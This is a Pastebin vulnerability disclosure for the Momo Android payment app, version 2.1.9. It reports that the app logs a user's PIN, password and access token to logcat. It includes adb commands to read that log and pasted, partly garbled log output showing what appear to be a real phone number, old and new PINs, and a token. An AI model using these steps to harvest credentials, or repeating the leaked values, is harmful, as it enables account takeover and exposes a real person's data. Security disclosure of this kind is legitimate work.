Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Application: Momo
- #Platform: Android
- #Version: 2.1.9
- #Severity: Medium
- #Author: Loc Phan Van
- #Impact: non-root user to find out the username/password of a valid user and user's access token via logcat
- POC:
- 1. Find application process
- adb shell "ps -A" | grep momo
- 2. Look for logcat information
- adb logcat| <momo-app-process>
- 3. Navigate to change password
- 4. The sensitive information of user printed via logcat
- 5283 1 ReactNattves: [1553166852873000000]Request ->https://owa.momo.vn:443/ap 03-21 5208 t Body: {"user" : "0976739197" , "msgrype" : "CHANGE PIN , " " cmdld " "tang" : "vt" , "channel" : " " : "1553166852873000000 , APP" , "time" : 1553166852873, " appver" : 21091, " appcode" : "2.1.9" , "deviceos " : "ANDROID " , " result" : true , "errorcode " " : " " , "extra " : checksum " : "CSBC1qqMf9wm20RCWQgUcv11ZIU7USDBB+HQZt032hk/hcvgMAJzrvwJCG05ZC18MFO :O, "errorDesc "momoMsg" : {"_class" : "mservtce . backend . entity . msg . Changeptnmsg , " " newPin ' " : ' 111212" , "oldPin " : "131645" , " agentReference " : "0976736548"} , " pass " : "131645"
- 5283 1 ReactNattves: momomodel.js-token: eyJoeXAtotJKVIQtLCJhbGctotJ1uz11NtJ9. 03-21 5208 eync2VY1jotMDk3Njcz0TE5NY1s1napbt161jEIMT15NC1s1m1tZWktotJhzjQ2M210Nt1mMT1jLTRIY2mtYTE2zt11MDgyzrommmFtz mmtLCJPYXQtOjEINTMXNjYZODYS1mV4CC16MTUIMZE20Tk4NnO.gzb61c1F8ZOT3TIFujb29-YEsk1CJ4BE33mH tav6au
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement